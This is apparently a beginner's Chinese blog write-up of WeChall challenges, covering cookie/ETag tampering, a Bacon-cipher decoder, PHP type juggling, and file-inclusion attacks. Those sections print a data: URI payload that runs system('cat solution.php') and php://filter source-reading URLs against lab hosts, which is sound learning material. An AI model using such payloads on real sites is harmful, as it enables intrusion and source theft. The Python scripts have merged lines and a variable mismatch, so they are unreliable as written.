初入ctf,写下记录以便查看。这里是wechall的一些题解。


1. Training: Tracks (HTTP)

1、进入投票页面

点击 + 号,

再次点击进行投票。

此时完成第一次投票。进行第二次时会报错。

这时,我们将VOTE cookie删掉,如果不删会导致后续不成功。

打开burp suite,抓包改包。修改If-None-Match的值,请求更新数据,因为服务器一开始会分配Etag,然后下次检测时会对比两者的值,如果一样就不更新数据,导致无法投票。

然后投票成功,通过题目。


2、Training: Baconian (Stegano, Encoding, Crypto, Training)

这题是解密培根密码,培根密码有两种密码表,并使用’A’、’B’代替0,1进行编码。

第一种密码表:

第二种密码表:

**假如我要加密‘hello’,按照第一种方法加密的结果为:aabbb,aabaa,ababa,ababa,abbab;第二种为:aabbb,aabaa,ababb,ababb,abbba。
假如要解密‘WOrld…’,把整个字符串的大小写代表着‘A’、‘B’编码,所以这里有两个编码可能性,一是大写代表‘A’,小写代表‘B’,第二种相反。同时这里又有两种密码表,所以这里一共有2*2=4种可能性。
大写代表‘A’,小写代表‘B’,用第一种密码表可得:‘h’,第二种为:‘h’,这里刚好一样。
大写代表‘B’,小写代表‘A’,用第一种密码表没有结果,第二种为:‘y’。**

所以将题目中给出的字符进行清洗,去除非字母字符包括数字。然后写个python脚本 。

import re
Str = ‘………..’
arr = re.findall('.{5}', str)
alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
first_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","babaa","babab","babba","babbb","bbaaa","bbaab"]
second_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","baabb","babaa","babab","babba","babbb"]keyword1 = ""
keyword2 = ""
keyword3 = ""
keyword4 = ""
for one in arr:toab1 = ""toab2 = ""for i in one:if i.isupper():toab1 += 'b'toab2 += 'a'else:toab1 += 'a'toab2 += 'b'for local,ab in enumerate(first_cipher):if ab == toab1:keyword1 += alphabet[local]if ab == toab2:keyword3 += alphabet[local]for local,ab in enumerate(second_cipher):if ab == toab1:keyword2 += alphabet[local]if ab == toab2:keyword4 += alphabet[local]print(keyword1)
print(keyword2)
print(keyword3)
print(keyword4)

在输出中匹配‘is’,(别问为什么可以如此操作,,,直觉)并替换‘x’为空格。即可得出flag:iblpsclsennp


3、Repeating History (Research)

打开题中给出的github项目地址,找到该题目的文件夹。发现有两个文件夹,然后,,找。。。

先打开history

然后在install.php中可以找到$solution = ‘2bda2998d9b0ee197da142a0447f6725’; 进行md5解码可得“wrong”,发现是错误的。再查看提交记录。

查看图示中的历史

可以找到真实的solution。

翻遍这个文件夹也没有找到其他信息,返回打开repeating文件夹,可以找到第一部分。

Oh right... the solution to part one is '<?php /*InDaxIn*/ ?>' without the PHP comments and singlequotes.

所以,flag为:InDaxInNothingHereMoveAlong


4、PHP 0818 (Exploit, PHP)

审计,可以看到要提交的魔数,但在前面的for循环中又不允许出现“1-9”的数字。同时,return时用的是“==”而不是“===”,所以可能是弱类型利用。将魔数进行16进制转换,可以得到:deadc0de,0并不在其中。所以提交0xdeadc0de,解决问题。


5、Warchall: Live LFI (Linux, Exploit, Warchall)

文件包含,打开链接,发现只有设置网站语言的地方有参数传递,所以尝试构造:http://lfi.warchall.net/index.php?lang=solution.php。

一看有戏,尝试读取文件源码。这里介绍读源码的两种:

?file=data:text/plain,<?php system("cat solution.php")?>
?file=php://filter/read=convert.base64-encode/resource=index.php

构造:http://lfi.warchall.net/?lang=php://filter/read=convert.base64-encode/resource=solution.php。

Base64解密后可得:SteppinStones42Pie


6、Warchall: Live RFI (Linux, Exploit, Warchall)

与上题类似,读取文件,构造:http://rfi.warchall.net/index.php?lang=php://filter/read=convert.base64-encode/resource=solution.php。

Base64解码:

<html>
<body>
<pre>NOTHING HERE????</pre>
</body>
</html>
<?php return 'Low_H4NGING_Fruit'; ?>

这里也可以用:http://rfi.warchall.net/index.php?lang=data:text/plain,<?php system("cat solution.php")?>。

点击查看源代码:

手工,提交。


7、Can you read me (Coding, Image)

DescriptionA friend and me have a bet running, that you won't beat his OCR program in scanning text out of images.His average scan time is 2.5 seconds, can you beat that?

要求在2.5s内识别并提交,首先安装tesseract:

apt install tesseract-ocr。

编写python脚本:

import requests
import oscookie = {'WC':'9953502-36792-3nWdWNVeHmWfnYj',
}
html = requests.get('http://www.wechall.net/challenge/can_you_readme/gimme.php', cookies=cookie)
png = open('png.jpg', 'wb').write(html.content) #写图片要使用二进制,并且使用html.content,而不是html.textlog = os.system('tesseract png.jpg png -l eng')
keyword = open('dec.txt', 'r').readline().rstrip('\n')
print('keyword is ' + keyword)
url = 'http://www.wechall.net/challenge/can_you_readme/index.php?solution={0}&cmd=Answer'.format(keyword)
page = requests.get(url, cookies=cookie)
print(page.text)

搞定。

Wechall Wireup(一)相关推荐

  1. wechall.net/stegano 解题心得

    /* 转载请注明出处:http://www.cnblogs.com/Martinium/p/wechall_stegano.html */ 最近迷上了 www.wechall.net 网站,里面都是些 ...

  2. Writeup For WeChall

    Choose your Path 本文内容为WeChall网站中部分题目的解答,供学习.记录与分享. Choose your Path 本题中对于solution.txt文件并没有阅读权限,所以要用另 ...

  3. wechall靶场training系列通关记录

    wechall靶场Training系列通关记录 Training: Get Sourced 第一题很简单,获取藏在网页源代码中的密码.F12查看网页中的注释即可找到答案: Training: Steg ...

  4. WeChall CTF Writeup(七)

    文章目录 0x07 2 Repeating History by space and Gizmore 0x08 2 PHP My Admin by Gizmore 0x09 2 Training: C ...

  5. wechall做题之www-robots

    页面提示: In this little training challenge, you are going to learn about the Robots_exclusion_standard. ...

  6. WeChall WWW - Rewrites (HTTP, Trai.. 解法

    分析 比www-basic复杂的是,我们要url rewrite.这需要在httpd.conf里去掉rewrite_module的注释 并且在你的用户名目录新建.htaccess文件,创建方法是:打开 ...

  7. WeChall mysql WriteUp

    WeChall mysql WriteUp 题目链接:http://www.wechall.net/challs/MySQL/by/chall_score/ASC/page-1 1.No Escape ...

  8. WeChall Simply Red (Stegano, Image) 答案

    分析 点击问号可以看看提示: 看Gizmore的提示,图片名字很重要,擎天柱(Optimus Prime) 又提到了filter,过滤 解决 有了这些信息:prime素数,以及题目和图片的颜色红色(R ...

  9. WeChall Towers of Hanoi (Java, Crac... 答案

    还没开始学Java,先贴下别人的答案,省得以后找不到. Towers of Hanoi - 我怎么能不努力奋斗 - 博客园

  10. We Chall-Prime Factory-Writeup

    MarkdownPad Document We Chall-Prime Factory-Writeup 题目链接:http://www.wechall.net/challenge/training/p ...

最新文章

  1. 《Kotlin极简教程》第三章 Kotlin基本数据类型
  2. 算法导论之平摊分析(动态表)
  3. 记一次不成功的redis访问
  4. 2018第二届河北省大学生程序设计竞赛题解
  5. 机器学习之LDA主题模型算法
  6. C# 使用List泛型读取和保存文本文件(转载)
  7. UniLayer集成Chainlink预言机喂价
  8. cupsd进程_Linux进程基础
  9. 延时消抖c语言,蓝桥杯练习(二)按键的使用和延时消抖
  10. 图形化开发(九)01-Three.js之案例——王者荣耀demo制作
  11. ImportError: cannot import name ‘_validate_lengths‘解决方法
  12. 泱泱大中华,美丽我的家 - 俗晒网速,感受幸福
  13. 手把手教你基于PaddlePaddle的情绪识别
  14. 苹果新旧手机数据转移_如何将数据从安卓设备转移到iPhone12_苹果手机_手机学院...
  15. 大厂前端面试都问些什么问题?入职爱奇艺年薪48万,面试经验总结
  16. Linux命令基础入门
  17. java class的方法_Java Class类常用方法描述
  18. 班级文化建设计算机专业,云计算背景下计算机专业三二段学生班级文化建设研究①...
  19. u盘提示格式化怎么修复?80%的人都在这么做!
  20. 微信小程序商城:解决用户拉新与留存问题

热门文章

  1. 概念学习(学习笔记)
  2. ICT技术成熟度曲线:零信任、数据安全、云原生安全的兴起
  3. STM32入门学习经验总结
  4. {“errcode“:40125,“errmsg“:“invalid appsecret, rid: 62735cd3-36d42de3-6f09796c“}
  5. CMOS图像传感器内部结构及工作原理
  6. 职业经验分享之我是如何转行成为数据分析师的
  7. IT黑马之用户信息管理系统
  8. photoshop的抠图小结
  9. 洛谷:P4568 [JLOI2011]飞行路线(分层图 / 二分错解(x))
  10. 爱快支持服务器网卡嘛,虚拟机安装爱快软路由,跟我一起来测试,单网卡安装教程...